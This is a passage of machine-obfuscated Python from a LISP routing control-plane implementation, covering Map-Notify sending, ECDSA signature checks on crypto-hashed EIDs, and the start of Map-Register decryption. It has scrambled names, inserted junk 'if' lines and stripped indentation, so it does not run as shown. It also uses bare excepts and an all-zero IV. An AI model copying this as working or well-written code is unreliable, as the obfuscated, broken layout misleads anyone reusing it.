if 57 - 57: oO0o + O0 - OoOoOO00
if 14 - 14: II111iiii + i11iIiiIii + Ii1I / o0oOOo0O0Ooo . OoO0O00
if 93 - 93: o0oOOo0O0Ooo + i1IIi
if 24 - 24: i1IIi
if 54 - 54: iIii1I11I1II1 - IiII + o0oOOo0O0Ooo + I1ii11iIi11i + IiII
if 99 - 99: Oo0Ooo
def lisp_send_map_notify_ack ( lisp_sockets , eid_records , map_notify , ms ) :
map_notify . map_notify_ack = True
if 38 - 38: I1ii11iIi11i - I1IiiI
if 50 - 50: iII111i % OoO0O00 - oO0o + Oo0Ooo . O0 . iII111i
if 42 - 42: iII111i + I1ii11iIi11i
if 44 - 44: I1ii11iIi11i % IiII
IIii1i = map_notify . encode ( eid_records , ms . password )
map_notify . print_notify ( )
if 1 - 1: Oo0Ooo + IiII - I1Ii111 / I1Ii111
if 25 - 25: OoOoOO00
if 52 - 52: OOooOOo + IiII
if 73 - 73: OoooooooOO - I1Ii111 % iII111i / OOooOOo . o0oOOo0O0Ooo - IiII
oO0o0 = ms . map_server
lprint ( "Send Map-Notify-Ack to {}" . format (
red ( oO0o0 . print_address ( ) , False ) ) )
lisp_send ( lisp_sockets , oO0o0 , LISP_CTRL_PORT , IIii1i )
return
if 69 - 69: Ii1I . iIii1I11I1II1 / Oo0Ooo * Oo0Ooo % IiII
if 5 - 5: OOooOOo - I1Ii111 + IiII
if 82 - 82: OOooOOo
if 26 - 26: ooOoO0o + OoooooooOO + ooOoO0o * I1Ii111
if 26 - 26: I1IiiI - OOooOOo
if 34 - 34: I1Ii111 % I1IiiI . OoOoOO00 / iII111i + ooOoO0o . i11iIiiIii
if 51 - 51: OoooooooOO * I1Ii111 * I11i - I1ii11iIi11i + I1Ii111
if 50 - 50: OoooooooOO * II111iiii
def lisp_send_multicast_map_notify ( lisp_sockets , site_eid , eid_list , xtr ) :
if 7 - 7: ooOoO0o / I11i * iII111i
IiiiiIiI1ii = lisp_map_notify ( lisp_sockets )
IiiiiIiI1ii . record_count = 1
IiiiiIiI1ii . nonce = lisp_get_control_nonce ( )
IiiiiIiI1ii . nonce_key = lisp_hex_string ( IiiiiIiI1ii . nonce )
IiiiiIiI1ii . etr . copy_address ( xtr )
IiiiiIiI1ii . etr_port = LISP_CTRL_PORT
IiiiiIiI1ii . eid_list = eid_list
ii1i1I1111ii = IiiiiIiI1ii . nonce_key
if 17 - 17: O0 % I1Ii111
if 28 - 28: i1IIi * ooOoO0o
if 14 - 14: II111iiii + II111iiii - I11i / I11i . OoOoOO00 + OoO0O00
if 92 - 92: II111iiii - II111iiii % IiII
if 48 - 48: oO0o / II111iiii + oO0o
if 16 - 16: o0oOOo0O0Ooo % II111iiii - i11iIiiIii - IiII + O0 - i11iIiiIii
lisp_remove_eid_from_map_notify_queue ( IiiiiIiI1ii . eid_list )
if ( lisp_map_notify_queue . has_key ( ii1i1I1111ii ) ) :
IiiiiIiI1ii = lisp_map_notify_queue [ ii1i1I1111ii ]
lprint ( "Map-Notify with nonce 0x{} pending for ITR {}" . format ( IiiiiIiI1ii . nonce , red ( xtr . print_address_no_iid ( ) , False ) ) )
if 58 - 58: OoooooooOO / I1ii11iIi11i - Oo0Ooo / II111iiii
return
if 13 - 13: o0oOOo0O0Ooo + OoOoOO00 * ooOoO0o % IiII
if 18 - 18: I1IiiI . I1ii11iIi11i + Oo0Ooo - iII111i
if 53 - 53: ooOoO0o / IiII
if 36 - 36: iIii1I11I1II1
if 78 - 78: II111iiii * I11i
lisp_map_notify_queue [ ii1i1I1111ii ] = IiiiiIiI1ii
if 47 - 47: Ii1I
if 42 - 42: I11i . oO0o - I1IiiI / OoO0O00
if 75 - 75: I1IiiI / OoOoOO00 . I11i * iIii1I11I1II1
if 53 - 53: iIii1I11I1II1
iiIii11Ii = site_eid . rtrs_in_rloc_set ( )
if ( iiIii11Ii ) :
if ( site_eid . is_rtr_in_rloc_set ( xtr ) ) : iiIii11Ii = False
if 47 - 47: O0 . OoO0O00 * I1Ii111 - oO0o % Oo0Ooo * i1IIi
if 45 - 45: OOooOOo / Ii1I
if 99 - 99: I1IiiI
if 16 - 16: o0oOOo0O0Ooo + OoOoOO00 / oO0o + iII111i % oO0o / o0oOOo0O0Ooo
if 50 - 50: OOooOOo % oO0o
iiI = lisp_eid_record ( )
iiI . record_ttl = 1440
iiI . eid . copy_address ( site_eid . eid )
iiI . group . copy_address ( site_eid . group )
iiI . rloc_count = 0
for iIII in site_eid . registered_rlocs :
if ( iiIii11Ii ^ iIII . is_rtr ( ) ) : continue
iiI . rloc_count += 1
if 63 - 63: I1ii11iIi11i / o0oOOo0O0Ooo . II111iiii + iII111i * i1IIi - o0oOOo0O0Ooo
IIii1i = iiI . encode ( )
if 37 - 37: OoooooooOO * iII111i . i11iIiiIii % I1Ii111 + oO0o . I1ii11iIi11i
if 17 - 17: iII111i + ooOoO0o % Oo0Ooo * i1IIi / O0 * oO0o
if 58 - 58: OOooOOo . iII111i - Oo0Ooo / iII111i . I11i
if 86 - 86: iIii1I11I1II1 - iII111i % Ii1I
IiiiiIiI1ii . print_notify ( )
iiI . print_record ( " " , False )
if 18 - 18: oO0o / IiII - OOooOOo % Ii1I
if 88 - 88: i11iIiiIii
if 13 - 13: I1IiiI
if 52 - 52: Ii1I * oO0o / I1Ii111 . IiII
for iIII in site_eid . registered_rlocs :
if ( iiIii11Ii ^ iIII . is_rtr ( ) ) : continue
iIii1IiIiI = lisp_rloc_record ( )
iIii1IiIiI . store_rloc_entry ( iIII )
IIii1i += iIii1IiIiI . encode ( )
iIii1IiIiI . print_record ( " " )
if 84 - 84: OoooooooOO - oO0o - I1Ii111
if 69 - 69: OoOoOO00 * Ii1I % OoooooooOO % OOooOOo * OoOoOO00
if 20 - 20: IiII
if 17 - 17: o0oOOo0O0Ooo % iIii1I11I1II1
if 66 - 66: OoooooooOO + IiII . II111iiii
IIii1i = IiiiiIiI1ii . encode ( IIii1i , "" )
if ( IIii1i == None ) : return
if 66 - 66: iIii1I11I1II1 % I11i
if 38 - 38: I1ii11iIi11i * ooOoO0o
if 77 - 77: OOooOOo - i11iIiiIii - I1ii11iIi11i
if 94 - 94: OoO0O00 % iII111i - I1Ii111 + OoO0O00 - I1IiiI
lisp_send_map_notify ( lisp_sockets , IIii1i , xtr , LISP_CTRL_PORT )
if 65 - 65: OOooOOo
if 90 - 90: O0
if 91 - 91: O0 * OoOoOO00 - OoOoOO00 * II111iiii - iII111i
if 38 - 38: oO0o * I11i % OOooOOo
IiiiiIiI1ii . retransmit_timer = threading . Timer ( LISP_MAP_NOTIFY_INTERVAL ,
lisp_retransmit_map_notify , [ IiiiiIiI1ii ] )
IiiiiIiI1ii . retransmit_timer . start ( )
return
if 80 - 80: O0 % II111iiii / O0 . Oo0Ooo * OoOoOO00 + OOooOOo
if 47 - 47: Ii1I - Oo0Ooo * OoOoOO00
if 20 - 20: oO0o
if 48 - 48: I1IiiI % OoO0O00
if 33 - 33: Ii1I
if 73 - 73: Ii1I . IiII
if 43 - 43: I11i . IiII - iII111i * I1IiiI * iII111i
def lisp_queue_multicast_map_notify ( lisp_sockets , rle_list ) :
ooo0oOoOOO0o = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 21 - 21: Oo0Ooo % O0 + iII111i . iIii1I11I1II1 + i1IIi - iII111i
for iiI1 in rle_list :
iiI1IIiI1Ii = lisp_site_eid_lookup ( iiI1 [ 0 ] , iiI1 [ 1 ] , True )
if ( iiI1IIiI1Ii == None ) : continue
if 94 - 94: OoOoOO00 . iII111i - IiII
if 15 - 15: i11iIiiIii - OoOoOO00 % I11i - I1ii11iIi11i + o0oOOo0O0Ooo - II111iiii
if 22 - 22: o0oOOo0O0Ooo + OOooOOo + ooOoO0o
if 45 - 45: I1Ii111 - i1IIi
if 88 - 88: OoO0O00 - II111iiii * I1ii11iIi11i % iIii1I11I1II1 + IiII * iII111i
if 22 - 22: OOooOOo . I1IiiI . OoO0O00
if 74 - 74: o0oOOo0O0Ooo / OoooooooOO * iII111i / oO0o / Ii1I % iII111i
ooO0o0o = iiI1IIiI1Ii . registered_rlocs
if ( len ( ooO0o0o ) == 0 ) :
Ii1ii1 = { }
for o00Ii in iiI1IIiI1Ii . individual_registrations . values ( ) :
for iIII in o00Ii . registered_rlocs :
if ( iIII . is_rtr ( ) == False ) : continue
Ii1ii1 [ iIII . rloc . print_address ( ) ] = iIII
if 45 - 45: OoO0O00
if 31 - 31: I1IiiI . O0 % Ii1I . oO0o
ooO0o0o = Ii1ii1 . values ( )
if 91 - 91: O0 - oO0o * O0
if 98 - 98: Ii1I
if 54 - 54: oO0o
if 85 - 85: oO0o % o0oOOo0O0Ooo % IiII
if 84 - 84: IiII . OoO0O00
if 73 - 73: OoOoOO00
iii1IIi11 = [ ]
iiII1I11i1iii = False
if ( iiI1IIiI1Ii . eid . address == 0 and iiI1IIiI1Ii . eid . mask_len == 0 ) :
IiIII11IIIi1 = [ ]
O00oOOoo00oo = [ ]
if ( len ( ooO0o0o ) != 0 and ooO0o0o [ 0 ] . rle != None ) :
O00oOOoo00oo = ooO0o0o [ 0 ] . rle . rle_nodes
if 63 - 63: iIii1I11I1II1
for iIIII1iiIII in O00oOOoo00oo :
iii1IIi11 . append ( iIIII1iiIII . address )
IiIII11IIIi1 . append ( iIIII1iiIII . address . print_address_no_iid ( ) )
if 92 - 92: O0 % I1IiiI / OOooOOo
lprint ( "Notify existing RLE-nodes {}" . format ( IiIII11IIIi1 ) )
else :
if 43 - 43: I11i - I11i
if 27 - 27: Ii1I / o0oOOo0O0Ooo . iIii1I11I1II1 . I1IiiI - OoO0O00
if 28 - 28: ooOoO0o
if 88 - 88: oO0o
if 77 - 77: ooOoO0o + I1Ii111 . OoOoOO00
for iIII in ooO0o0o :
if ( iIII . is_rtr ( ) ) : iii1IIi11 . append ( iIII . rloc )
if 2 - 2: i1IIi - IiII + iIii1I11I1II1 % i1IIi * II111iiii
if 26 - 26: I11i
if 57 - 57: I1ii11iIi11i + I1Ii111 + i11iIiiIii . i1IIi / i11iIiiIii
if 43 - 43: Ii1I % I11i
if 5 - 5: OoooooooOO % i11iIiiIii * o0oOOo0O0Ooo * OoooooooOO - o0oOOo0O0Ooo % I11i
iiII1I11i1iii = ( len ( iii1IIi11 ) != 0 )
if ( iiII1I11i1iii == False ) :
oO00Oooo0o0o0 = lisp_site_eid_lookup ( iiI1 [ 0 ] , ooo0oOoOOO0o , False )
if ( oO00Oooo0o0o0 == None ) : continue
if 58 - 58: i11iIiiIii % Ii1I + Oo0Ooo - OoOoOO00 - i11iIiiIii / O0
for iIII in oO00Oooo0o0o0 . registered_rlocs :
if ( iIII . rloc . is_null ( ) ) : continue
iii1IIi11 . append ( iIII . rloc )
if 36 - 36: OOooOOo
if 42 - 42: OOooOOo * ooOoO0o * i11iIiiIii + OoooooooOO . iIii1I11I1II1
if 95 - 95: i1IIi * O0 / II111iiii * OoOoOO00 * I1IiiI
if 38 - 38: OOooOOo - OoOoOO00 / OoO0O00 / o0oOOo0O0Ooo - i11iIiiIii
if 4 - 4: I1IiiI * o0oOOo0O0Ooo - I11i - OoooooooOO . OoooooooOO
if 79 - 79: oO0o - iII111i
if ( len ( iii1IIi11 ) == 0 ) :
lprint ( "No ITRs or RTRs found for {}, Map-Notify suppressed" . format ( green ( iiI1IIiI1Ii . print_eid_tuple ( ) , False ) ) )
if 34 - 34: OoooooooOO + Ii1I - iII111i + OoooooooOO / I1IiiI
continue
if 39 - 39: o0oOOo0O0Ooo . i1IIi * OoO0O00 / II111iiii / I1ii11iIi11i * OOooOOo
if 39 - 39: O0 . OOooOOo
if 95 - 95: I11i
if 58 - 58: I1ii11iIi11i / i11iIiiIii + iII111i + I11i / oO0o
if 8 - 8: I1ii11iIi11i
if 100 - 100: OoooooooOO / I11i - Ii1I
for I11iiI1III in iii1IIi11 :
lprint ( "Build Map-Notify to {}TR {} for {}" . format ( "R" if iiII1I11i1iii else "x" , red ( I11iiI1III . print_address_no_iid ( ) , False ) ,
# O0
green ( iiI1IIiI1Ii . print_eid_tuple ( ) , False ) ) )
if 43 - 43: Oo0Ooo . I1IiiI
OooOOoooOO00 = [ iiI1IIiI1Ii . print_eid_tuple ( ) ]
lisp_send_multicast_map_notify ( lisp_sockets , iiI1IIiI1Ii , OooOOoooOO00 , I11iiI1III )
time . sleep ( .001 )
if 68 - 68: Ii1I * Oo0Ooo - O0 . i11iIiiIii * I1ii11iIi11i . OoooooooOO
if 96 - 96: Ii1I . i11iIiiIii + ooOoO0o - II111iiii - Ii1I
return
if 28 - 28: Ii1I + OoooooooOO * I11i * OoOoOO00 + OoO0O00
if 87 - 87: I1Ii111 / O0 % O0 * o0oOOo0O0Ooo / II111iiii
if 25 - 25: I1ii11iIi11i * ooOoO0o + I11i + iIii1I11I1II1 / iIii1I11I1II1
if 76 - 76: iII111i
if 85 - 85: I1ii11iIi11i + OOooOOo % i1IIi
if 13 - 13: OOooOOo + i11iIiiIii / OOooOOo . O0 . OoO0O00 - Ii1I
if 31 - 31: OoOoOO00 * o0oOOo0O0Ooo / O0 . iII111i / i11iIiiIii
if 22 - 22: I1IiiI . OoooooooOO * I1ii11iIi11i + i11iIiiIii - O0 + i11iIiiIii
def lisp_find_sig_in_rloc_set ( packet , rloc_count ) :
for IiIIi1IiiIiI in range ( rloc_count ) :
iIii1IiIiI = lisp_rloc_record ( )
packet = iIii1IiIiI . decode ( packet , None )
OOooo0o = iIii1IiIiI . json
if ( OOooo0o == None ) : continue
if 20 - 20: OOooOOo . OoooooooOO * OOooOOo * I1ii11iIi11i
try :
OOooo0o = json . loads ( OOooo0o . json_string )
except :
lprint ( "Found corrupted JSON signature" )
continue
if 85 - 85: O0 / II111iiii * O0 - iII111i % i11iIiiIii
if 47 - 47: OoOoOO00
if ( OOooo0o . has_key ( "signature" ) == False ) : continue
return ( iIii1IiIiI )
if 4 - 4: OOooOOo + I1ii11iIi11i - iII111i + OOooOOo / IiII
return ( None )
if 23 - 23: iIii1I11I1II1 + OoooooooOO + ooOoO0o . iII111i . Oo0Ooo - iIii1I11I1II1
if 25 - 25: O0 + I1IiiI % OOooOOo / Oo0Ooo . IiII / I1Ii111
if 84 - 84: ooOoO0o . O0 + I1IiiI * OoO0O00 - I1IiiI
if 24 - 24: Ii1I
if 23 - 23: Oo0Ooo * i1IIi / I1IiiI . I11i - I1ii11iIi11i . iIii1I11I1II1
if 15 - 15: O0 + o0oOOo0O0Ooo / oO0o
if 27 - 27: Ii1I * II111iiii / oO0o
if 99 - 99: I11i + ooOoO0o % I11i + O0 - Ii1I - I1Ii111
if 3 - 3: Oo0Ooo . I1IiiI
if 61 - 61: OoO0O00 - I1ii11iIi11i . Ii1I * i11iIiiIii
if 97 - 97: ooOoO0o
if 58 - 58: iII111i
if 47 - 47: II111iiii % Oo0Ooo . iIii1I11I1II1 . oO0o
if 52 - 52: I11i * I1IiiI % I11i - iII111i - Ii1I - OoooooooOO
if 15 - 15: iII111i
if 95 - 95: i11iIiiIii . Ii1I / II111iiii + II111iiii + Ii1I / I11i
if 72 - 72: I1Ii111 . I1Ii111 * O0 + I1ii11iIi11i / Oo0Ooo
if 96 - 96: oO0o . ooOoO0o * Oo0Ooo % ooOoO0o + I1Ii111 + iIii1I11I1II1
if 45 - 45: II111iiii
def lisp_get_eid_hash ( eid ) :
iII1iiIiIii1I = None
for iIi1iIi1 in lisp_eid_hashes :
if 46 - 46: i11iIiiIii / I1ii11iIi11i
if 30 - 30: Oo0Ooo
if 68 - 68: i1IIi
if 98 - 98: o0oOOo0O0Ooo + I1ii11iIi11i - oO0o + i1IIi
o0OoO0000o = iIi1iIi1 . instance_id
if ( o0OoO0000o == - 1 ) : iIi1iIi1 . instance_id = eid . instance_id
if 85 - 85: I1Ii111 - I1Ii111 . ooOoO0o % I1ii11iIi11i . OOooOOo
o00oO0Oo = eid . is_more_specific ( iIi1iIi1 )
iIi1iIi1 . instance_id = o0OoO0000o
if ( o00oO0Oo ) :
iII1iiIiIii1I = 128 - iIi1iIi1 . mask_len
break
if 56 - 56: IiII / I1Ii111 - O0
if 69 - 69: I1Ii111 * ooOoO0o / I1ii11iIi11i * OoooooooOO
if ( iII1iiIiIii1I == None ) : return ( None )
if 47 - 47: I1ii11iIi11i
ii1i1II11II1i = eid . address
OoO = ""
for IiIIi1IiiIiI in range ( 0 , iII1iiIiIii1I / 16 ) :
IiiIIi1 = ii1i1II11II1i & 0xffff
IiiIIi1 = hex ( IiiIIi1 ) [ 2 : - 1 ]
OoO = IiiIIi1 . zfill ( 4 ) + ":" + OoO
ii1i1II11II1i >>= 16
if 34 - 34: o0oOOo0O0Ooo / I1IiiI * i11iIiiIii + I1Ii111 / IiII
if ( iII1iiIiIii1I % 16 != 0 ) :
IiiIIi1 = ii1i1II11II1i & 0xff
IiiIIi1 = hex ( IiiIIi1 ) [ 2 : - 1 ]
OoO = IiiIIi1 . zfill ( 2 ) + ":" + OoO
if 55 - 55: iIii1I11I1II1 % iIii1I11I1II1 % iII111i
return ( OoO [ 0 : - 1 ] )
if 80 - 80: OoooooooOO % iII111i * IiII % IiII
if 34 - 34: OoO0O00
if 22 - 22: OOooOOo
if 23 - 23: I1ii11iIi11i
if 53 - 53: I11i
if 64 - 64: iIii1I11I1II1 + O0 % IiII
if 13 - 13: i11iIiiIii
if 49 - 49: OoOoOO00
if 61 - 61: I1Ii111 / I1Ii111 / iII111i / ooOoO0o - I1IiiI . o0oOOo0O0Ooo
if 80 - 80: I1IiiI - OOooOOo . oO0o
if 75 - 75: oO0o + OoOoOO00 - OoooooooOO
def lisp_lookup_public_key ( eid ) :
o0OoO0000o = eid . instance_id
if 38 - 38: I11i / ooOoO0o / OoOoOO00 * OOooOOo . oO0o
if 8 - 8: OoO0O00 . OOooOOo % I1Ii111 * OOooOOo / I1IiiI
if 3 - 3: IiII - I1ii11iIi11i . o0oOOo0O0Ooo
if 39 - 39: oO0o . I1Ii111 + oO0o % OoOoOO00 - i11iIiiIii
if 69 - 69: I11i / OoO0O00
oooo = lisp_get_eid_hash ( eid )
if ( oooo == None ) : return ( [ None , None , False ] )
if 100 - 100: I1IiiI . OOooOOo
oooo = "hash-" + oooo
oO00oO0OOoooO = lisp_address ( LISP_AFI_NAME , oooo , len ( oooo ) , o0OoO0000o )
O0o00oOOOO00 = lisp_address ( LISP_AFI_NONE , "" , 0 , o0OoO0000o )
if 72 - 72: iIii1I11I1II1 % iIii1I11I1II1 . OoOoOO00 * OoooooooOO * OoO0O00
if 26 - 26: Ii1I * I1IiiI % ooOoO0o / I1Ii111
if 80 - 80: I1Ii111 / O0 * O0
if 40 - 40: OoO0O00 - oO0o / o0oOOo0O0Ooo . oO0o
oO00Oooo0o0o0 = lisp_site_eid_lookup ( oO00oO0OOoooO , O0o00oOOOO00 , True )
if ( oO00Oooo0o0o0 == None ) : return ( [ oO00oO0OOoooO , None , False ] )
if 89 - 89: i11iIiiIii - II111iiii
if 67 - 67: IiII % I1Ii111 + i11iIiiIii
if 53 - 53: OOooOOo
if 95 - 95: oO0o - OOooOOo % I1Ii111 / OoooooooOO % OoooooooOO - O0
OO0o0OOO0ooOO00o = None
for oOo00O in oO00Oooo0o0o0 . registered_rlocs :
I1o0oO0Oo00Oo = oOo00O . json
if ( I1o0oO0Oo00Oo == None ) : continue
try :
I1o0oO0Oo00Oo = json . loads ( I1o0oO0Oo00Oo . json_string )
except :
lprint ( "Registered RLOC JSON format is invalid for {}" . format ( oooo ) )
if 75 - 75: I1IiiI
return ( [ oO00oO0OOoooO , None , False ] )
if 65 - 65: IiII
if ( I1o0oO0Oo00Oo . has_key ( "public-key" ) == False ) : continue
OO0o0OOO0ooOO00o = I1o0oO0Oo00Oo [ "public-key" ]
break
if 53 - 53: iIii1I11I1II1 / II111iiii . I1ii11iIi11i + OoooooooOO % OOooOOo
return ( [ oO00oO0OOoooO , OO0o0OOO0ooOO00o , True ] )
if 41 - 41: i1IIi / oO0o % OoooooooOO * OOooOOo + I1ii11iIi11i
if 56 - 56: OOooOOo * OOooOOo / o0oOOo0O0Ooo
if 4 - 4: OoOoOO00 / OoO0O00
if 66 - 66: I1Ii111 / OoOoOO00
if 53 - 53: OoOoOO00 . i11iIiiIii - OoooooooOO
if 92 - 92: O0 - i11iIiiIii + OoO0O00 - OoooooooOO - o0oOOo0O0Ooo
if 25 - 25: oO0o / oO0o / Ii1I / O0
if 56 - 56: ooOoO0o
def lisp_verify_cga_sig ( eid , rloc_record ) :
if 19 - 19: O0 * I1IiiI + I1ii11iIi11i
if 25 - 25: I11i - ooOoO0o / OoO0O00 / iII111i - OoO0O00
if 86 - 86: OoO0O00
if 89 - 89: OoooooooOO % iII111i * I1ii11iIi11i + I1ii11iIi11i . Oo0Ooo
if 4 - 4: I11i
o00 = json . loads ( rloc_record . json . json_string )
if 8 - 8: IiII
if ( lisp_get_eid_hash ( eid ) ) :
O000oOO0Oooo = eid
elif ( o00 . has_key ( "signature-eid" ) ) :
i11 = o00 [ "signature-eid" ]
O000oOO0Oooo = lisp_address ( LISP_AFI_IPV6 , i11 , 0 , 0 )
else :
lprint ( " No signature-eid found in RLOC-record" )
return ( False )
if 4 - 4: iIii1I11I1II1 % I1IiiI - OoooooooOO / iII111i
if 55 - 55: O0 + iII111i * OoOoOO00 . i11iIiiIii * Ii1I + oO0o
if 66 - 66: i1IIi . I1ii11iIi11i
if 86 - 86: Oo0Ooo
if 48 - 48: OoO0O00
oO00oO0OOoooO , OO0o0OOO0ooOO00o , OO0oo00Oo0ooO = lisp_lookup_public_key ( O000oOO0Oooo )
if ( oO00oO0OOoooO == None ) :
I11i11i1 = green ( O000oOO0Oooo . print_address ( ) , False )
lprint ( " Could not parse hash in EID {}" . format ( I11i11i1 ) )
return ( False )
if 49 - 49: I1ii11iIi11i - II111iiii % I1IiiI
if 24 - 24: ooOoO0o
OOo00oO0oo = "found" if OO0oo00Oo0ooO else bold ( "not found" , False )
I11i11i1 = green ( oO00oO0OOoooO . print_address ( ) , False )
lprint ( " Lookup for crypto-hashed EID {} {}" . format ( I11i11i1 , OOo00oO0oo ) )
if ( OO0oo00Oo0ooO == False ) : return ( False )
if 27 - 27: Oo0Ooo
if ( OO0o0OOO0ooOO00o == None ) :
lprint ( " RLOC-record with public-key not found" )
return ( False )
if 85 - 85: iIii1I11I1II1 . o0oOOo0O0Ooo + oO0o
if 79 - 79: O0 - iIii1I11I1II1 + i1IIi . I11i
ii111 = OO0o0OOO0ooOO00o [ 0 : 8 ] + "..." + OO0o0OOO0ooOO00o [ - 8 : : ]
lprint ( " RLOC-record with public-key '{}' found" . format ( ii111 ) )
if 4 - 4: oO0o / OoO0O00
if 90 - 90: I11i . IiII / OoO0O00 . IiII
if 62 - 62: i11iIiiIii * I11i + oO0o - i1IIi
if 9 - 9: I1IiiI
if 17 - 17: II111iiii + i11iIiiIii + IiII
iIIiii = o00 [ "signature" ]
if 2 - 2: I11i + I1IiiI . IiII . OoOoOO00 * oO0o - ooOoO0o
try :
o00 = binascii . a2b_base64 ( iIIiii )
except :
lprint ( " Incorrect padding in signature string" )
return ( False )
if 29 - 29: OoO0O00
if 78 - 78: iII111i * ooOoO0o + O0 % ooOoO0o + OoO0O00
IiIOoo = len ( o00 )
if ( IiIOoo & 1 ) :
lprint ( " Signature length is odd, length {}" . format ( IiIOoo ) )
return ( False )
if 76 - 76: IiII % I1IiiI * Ii1I / Ii1I / OoooooooOO + Ii1I
if 19 - 19: OoooooooOO
if 88 - 88: I1IiiI % ooOoO0o % Oo0Ooo - O0
if 71 - 71: OOooOOo % Ii1I - i11iIiiIii - oO0o . ooOoO0o / I1Ii111
if 53 - 53: iII111i . Oo0Ooo
oO0o0O00O00O = O000oOO0Oooo . print_address ( )
if 91 - 91: oO0o * OoooooooOO * oO0o % oO0o * II111iiii % I1Ii111
if 8 - 8: Ii1I
if 28 - 28: iII111i / I1ii11iIi11i - OoOoOO00 * Oo0Ooo + Ii1I * OoOoOO00
if 94 - 94: oO0o
OO0o0OOO0ooOO00o = binascii . a2b_base64 ( OO0o0OOO0ooOO00o )
try :
ii1i1I1111ii = ecdsa . VerifyingKey . from_pem ( OO0o0OOO0ooOO00o )
except :
o0Oo0o0ooOOO = bold ( "Bad public-key" , False )
lprint ( " {}, not in PEM format" . format ( o0Oo0o0ooOOO ) )
return ( False )
if 49 - 49: OOooOOo - iIii1I11I1II1 / ooOoO0o
if 28 - 28: OoOoOO00 + OoOoOO00 - OoOoOO00 / ooOoO0o
if 81 - 81: oO0o
if 34 - 34: o0oOOo0O0Ooo * OOooOOo - i1IIi * o0oOOo0O0Ooo * Oo0Ooo
if 59 - 59: iIii1I11I1II1 / Oo0Ooo % II111iiii
if 55 - 55: ooOoO0o - IiII + o0oOOo0O0Ooo
if 48 - 48: O0 - iIii1I11I1II1 * OOooOOo
if 33 - 33: I11i
if 63 - 63: Ii1I % II111iiii / OoOoOO00 + Oo0Ooo
if 28 - 28: OoO0O00 + I1IiiI . oO0o + II111iiii - O0
if 32 - 32: oO0o
try :
IIIiiI1I = ii1i1I1111ii . verify ( o00 , oO0o0O00O00O , hashfunc = hashlib . sha256 )
except :
lprint ( " Signature library failed for signature data '{}'" . format ( oO0o0O00O00O ) )
if 62 - 62: i11iIiiIii + OoooooooOO + IiII - OoO0O00 / oO0o * iIii1I11I1II1
lprint ( " Signature used '{}'" . format ( iIIiii ) )
return ( False )
if 91 - 91: o0oOOo0O0Ooo - i11iIiiIii + Oo0Ooo % iIii1I11I1II1
return ( IIIiiI1I )
if 58 - 58: iII111i / ooOoO0o - I1Ii111 + I1Ii111 * ooOoO0o
if 48 - 48: iII111i % O0 % Ii1I * OoO0O00 . OoO0O00
if 74 - 74: OoO0O00 * i1IIi + I1ii11iIi11i / o0oOOo0O0Ooo / i1IIi
if 94 - 94: Ii1I
if 13 - 13: OoO0O00 - II111iiii . iII111i + OoOoOO00 / i11iIiiIii
if 32 - 32: ooOoO0o / II111iiii / I1ii11iIi11i
if 34 - 34: iIii1I11I1II1
if 47 - 47: OOooOOo * iII111i
if 71 - 71: IiII - OoooooooOO * i11iIiiIii . OoooooooOO % i1IIi . Oo0Ooo
if 3 - 3: OoO0O00 + i11iIiiIii + oO0o * IiII
def lisp_remove_eid_from_map_notify_queue ( eid_list ) :
if 19 - 19: iII111i / II111iiii . I1Ii111 * I1IiiI - OOooOOo
if 70 - 70: OoO0O00
if 42 - 42: OoooooooOO - I1Ii111 + I1ii11iIi11i * iII111i * iII111i / OoO0O00
if 85 - 85: O0 . II111iiii
if 80 - 80: O0 * I11i * I1Ii111
O0oOooOoO0Oo = [ ]
for iiII11i1iIi in eid_list :
for OO0Ooo000O in lisp_map_notify_queue :
IiiiiIiI1ii = lisp_map_notify_queue [ OO0Ooo000O ]
if ( iiII11i1iIi not in IiiiiIiI1ii . eid_list ) : continue
if 71 - 71: IiII - iII111i % I1IiiI * iII111i
O0oOooOoO0Oo . append ( OO0Ooo000O )
i1I1I11II = IiiiiIiI1ii . retransmit_timer
if ( i1I1I11II ) : i1I1I11II . cancel ( )
if 99 - 99: Ii1I
lprint ( "Remove from Map-Notify queue nonce 0x{} for EID {}" . format ( IiiiiIiI1ii . nonce_key , green ( iiII11i1iIi , False ) ) )
if 79 - 79: I11i / iII111i % Ii1I / OoOoOO00 % O0 / IiII
if 32 - 32: IiII * II111iiii . Ii1I
if 68 - 68: I11i / O0
if 6 - 6: oO0o - oO0o . I1IiiI % I1ii11iIi11i
if 22 - 22: Ii1I / I1IiiI / II111iiii
if 31 - 31: II111iiii - Ii1I * OOooOOo - i11iIiiIii / OoooooooOO - I1Ii111
if 76 - 76: Oo0Ooo
for OO0Ooo000O in O0oOooOoO0Oo : lisp_map_notify_queue . pop ( OO0Ooo000O )
return
if 93 - 93: i1IIi - I1IiiI * i11iIiiIii / Ii1I . Ii1I - i1IIi
if 19 - 19: iIii1I11I1II1 * OOooOOo * Oo0Ooo % I1IiiI
if 93 - 93: IiII % OoOoOO00 / I1IiiI + o0oOOo0O0Ooo * ooOoO0o / i1IIi
if 25 - 25: O0 / Oo0Ooo - o0oOOo0O0Ooo * Oo0Ooo
if 45 - 45: Ii1I * IiII - OOooOOo
if 57 - 57: iII111i % OoO0O00 / OoooooooOO
if 69 - 69: oO0o
if 44 - 44: IiII - II111iiii % Ii1I
def lisp_decrypt_map_register ( packet ) :
if 64 - 64: Ii1I % OoO0O00 + OOooOOo % OoOoOO00 + IiII
if 92 - 92: iII111i * Oo0Ooo - OoOoOO00
if 33 - 33: i11iIiiIii - OoOoOO00 . OOooOOo * II111iiii . Ii1I
if 59 - 59: OoOoOO00
if 29 - 29: iII111i - II111iiii * OoooooooOO * OoooooooOO
Ii1I1i1IiiI = socket . ntohl ( struct . unpack ( "I" , packet [ 0 : 4 ] ) [ 0 ] )
I1i1i = ( Ii1I1i1IiiI >> 13 ) & 0x1
if ( I1i1i == 0 ) : return ( packet )
if 11 - 11: OOooOOo * i11iIiiIii % O0
i1I1iI = ( Ii1I1i1IiiI >> 14 ) & 0x7
if 81 - 81: OoO0O00 . ooOoO0o
if 78 - 78: II111iiii - i11iIiiIii . OOooOOo
if 22 - 22: Oo0Ooo + ooOoO0o
if 71 - 71: OOooOOo . Ii1I * i11iIiiIii . I11i
try :
IiiI = lisp_ms_encryption_keys [ i1I1iI ]
IiiI = IiiI . zfill ( 32 )
i1Oo = "0" * 8
except :
lprint ( "Cannot decrypt Map-Register with key-id {}" . format ( i1I1iI ) )
return ( None )
if 5 - 5: O0 + IiII % II111iiii % o0oOOo0O0Ooo * II111iiii . I1ii11iIi11i
if 67 - 67: OoOoOO00
OooOOOoOoo0O0 = bold ( "Decrypt" , False )
